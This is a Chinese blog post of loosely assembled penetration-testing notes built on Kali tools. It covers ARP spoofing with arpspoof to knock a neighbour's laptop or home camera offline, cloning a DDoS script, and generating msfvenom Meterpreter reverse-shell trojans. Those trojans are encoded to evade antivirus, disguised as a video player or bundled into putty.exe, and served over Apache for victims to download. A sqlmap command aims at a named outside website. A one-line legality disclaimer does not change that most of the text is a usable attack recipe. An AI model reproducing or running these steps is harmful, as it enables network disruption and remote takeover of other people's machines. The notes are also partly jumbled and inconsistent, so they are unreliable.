渗透测试之APR断网

owofile Lv5

渗透测试之APR断网

在kaili中,可以通过nmap扫描路由下存活主机和它开放的端口,之后可以通过攻击目标主机IP和网关实现断网攻击

比如当你链接一个网络,首先在本地查询当前网络的网关,然后扫描网关下存活的主机,最后通过主机IP实现攻击

文章

前言
ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。

一句话解释: 断网攻击用使用ARPspoof工具,欺骗设备,截断网关和被攻击主机之间的正常通信

请勿用于违法用途!

首先进入root用户
执行命令,然后输入你装系统的时候的密码,然后按Enter键

1
su

使用ipconfig查看自己网卡名称和网关。
例如我的网卡叫eth0。注意不要选错了,笔记本电脑有无线网卡和有线网卡,有线网卡一般叫eth0,有线网卡一般叫lo之类的名字。确认好你正在用什么方式联网,是网线还是WiFi,WiFi就是无线网卡,插网线就是有线网卡

查看网关,你和被攻击主机在同一个网络下,所以你的网关和被攻击主机的网关是一样的

其实如果你能看到路由器的话,也可以直接去看路由器管理页面的网址,一般是192.168.0.1,这个网址就是网关地址

1
ifconfig

使用nmap工具扫描设备
查看被攻击主机的IP地址,然后稍等片刻,扫描结果就会出来,命令格式是这样的:

1
nmap 你网关IP地址-200

比如我的网关是192.168.0.1 ,我的命令应该这样写

1
nmap 192.168.0.1-200

然后扫出来一些设备,在这些设备里面找你的攻击目标的IP地址

图为我的网关,和我电脑的ip地址,被攻击设备的ip我就不展示了。

你在输出内容里面能看到网关,自己电脑IP,被攻击主机IP

开始攻击
现在开始攻击,命令的格式是这样的,你刚刚已经把被攻击主机ip和网关的ip查好了

1
arpspoof -i eth0 -t 被攻击主机ip 网关

例如我想给我边上的笔记本电脑断网,那我就加上它的ip和网关,注意中间有空格

比如笔记本电脑的IP是192.168.0.102,网关是192.168.0.1

arpspoof -i eth0 -t 192.168.1.102 192.168.0.1

这样就可以断掉笔记本电脑的网络了

ARP攻击可以用于各种设备,我试过家里联网的能远程查看的监控也可以被攻击,亲手断过它的网,因为不喜欢被监视,(^▽^)

大家家里有没有监控呢?

如果有问题,欢迎请加入Skype群探讨!
————————————————

1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.csdn.net/albertensterin/article/details/128510328

后续清理

一旦停止ARP欺骗攻击,网络不会立即恢复正常状态。由于ARP缓存中可能已经存储了虚假的映射关系,因此需要一定时间才能够自动清除这些错误的ARP条目并重新建立正确的映射。

在某些情况下,受影响的主机可能需要等待一段时间才能够恢复到正常状态。但通常情况下,网络会随着时间的推移逐渐恢复正常。如果需要更快地恢复网络状态,可以尝试执行以下操作:

  1. 在受影响的主机上手动清除ARP缓存。
  2. 重启受影响的设备,以便清除错误的ARP缓存。

在进行安全测试时,请务必小心谨慎,并且确保拥有适当的授权。

清除ARP缓存可以通过以下方法进行:

在Windows上,可以打开命令提示符并执行以下命令:

1
arp -d \*

这将删除系统中所有已知的ARP条目。

在Linux上,可以打开终端并以root权限执行以下命令:

1
ip neigh flush all

这将清除系统中所有的邻居(包括ARP)缓存。

请注意,在执行这些命令时,可能会导致一些网络连接中断,因此请谨慎操作。

快速复制

shenglang

1
arpspoof -i eth0 -t 192.168.2.35 192.168.2.1

使用nmap 可以扫描端口

1
nmap [ip]

使用nmap -o 查询主机系统信息

1
nmap -o [ip]

查询网关

1
nmap -sP [ip]

扫描当前子网下的所有存活主机 比如你的ip是192.168.2.21 你想要扫描你这个网络下的所有Ip你可以使用

1
nmap 192.168.2.0/24

34 35 37 38 39 40 43 46 53 64 36

192.168.2.34

192.168.2.39 是一个存活主机 win10

arpspoof -i eth0 -t 192.168.2.37 192.168.2.1

DDOS

我已经提前再kali下载了脚本所以直接进入 ddos 文件夹内 使用

1
python ddos-p3.py

如果没有下载可以使用

1
git clone https://github.com/Andysun06/ddos

远控木马

msfvenom

链接:https://www.cnblogs.com/Cl0ud/p/11756544.html

生成

1
msfvenom -p windows/meterpreter/reverse\_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > ./Cl0ud.exe

LHOST就是你kali的ip地址,LPORT就是想要让kali监听用哪一个端口来监听这个shell,然后将这个生成的exe文件输出到当前目录下Cl0ud.exe

比如

开启metasploit框架

1
msfconsole

生成木马 msf5的生成代码

1
msfconsole -p windows/meterpreter/reverse\_tcp LHOST=192.168.2.36 LPORT=1234 -f exe > ./Cl0ud.exe

msf6:

1
msfvenom -p linux/x64/meterpreter\_reverse\_tcp LHOST=192.168.2.36 LPORT=1234 -f elf > shell.elf

不容易被免杀的方法

1
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse\_tcp LHOST=192.168.2.36 LPORT=1234 -b "\x00" -e x64/xor\_dynamic -i 10 -f exe -o /var/www/html/西瓜影音.exe
1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.csdn.net/qq_53030229/article/details/116751107

1
set payload windows/meterpreter/reverse\_tcp

监听

1
exploit

生成针对win10的反弹shell

1
msfvenom -p windows/meterpreter/reverse\_tcp lhost=192.168.2.36 lport=1234 -f exe >jiami.exe
1
2
3
4
5
6
7
8
9
10
这个解释一下
msfvenom 生成木马
-p 这个的意思是 payload,意思是攻击载荷,简单的说,生成怎么样的攻击模块
windows不用解释了吧
meterpreter/reverse\_tcp 反弹shell的意思,就是提权的意思
lhost=本地IP
lport=本地端口
-f 输出格式 例如苹果的MAC你就要输出的是dmg的格式
exe是windows的软件方式
>muma.exe 生成软件为muma.exe

木马放到apache下,然后windows才能访问才能下载

1
2
cp muma.exe /var/www/html/
把这个复制到网站服务器下面去

如果需要生成shellCode可以使用

1
msfvenom -p windows/x64/meterpreter/reverse\_tcp lhost=192.168.2.44 lport=4444 --encrypt base64 -f c

运行监听

1
2
3
4
5
6
msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse\_tcp
msf6 exploit(multi/handler) > set lhost 192.168.2.44
msf6 exploit(multi/handler) > set lport 1234
msf6 exploit(multi/handler) > run

开始网站服务

1
service apache2 start

关闭网站服务

1
service apache2 stop

这时候再同一网络的浏览器访问

1
http://192.168.2.44/hello.exe

就可以自动下载,由于没有免杀所以会被排除

SSH

1、查看ssh状态

1
/etc/init.d/ssh status

2、重启、开启、关闭ssh

重启ssh

1
/etc/init.d/ssh restart

开启ssh

1
/etc/init.d/ssh start

关闭ssh

1
/etc/init.d/ssh stop

msf自捆绑编码

1
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
1
msfvenom -p windows/meterpreter/reverse\_tcp LHOST=192.168.2.36 LPORT=1234 -e x86/shikata\_ga\_nai -x putty.exe -i 15 -f exe -o pentest4.exe

查看磁盘情况

1
df -h

加壳

slqmap

当程序有防get注入的时候,可以使用cookie注入

1
sqlmap -u "http://www.bjxhyn.com/index.php?m=admin&c=index&a=login&pc\_hash=?id=1"
  • Title: 渗透测试之APR断网
  • Author: owofile
  • Created at : 2024-02-27 03:49:31
  • Updated at : 2025-04-11 21:18:27
  • Link: https://owofile.github.io/blog/2024/02/27/渗透测试之APR断网/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments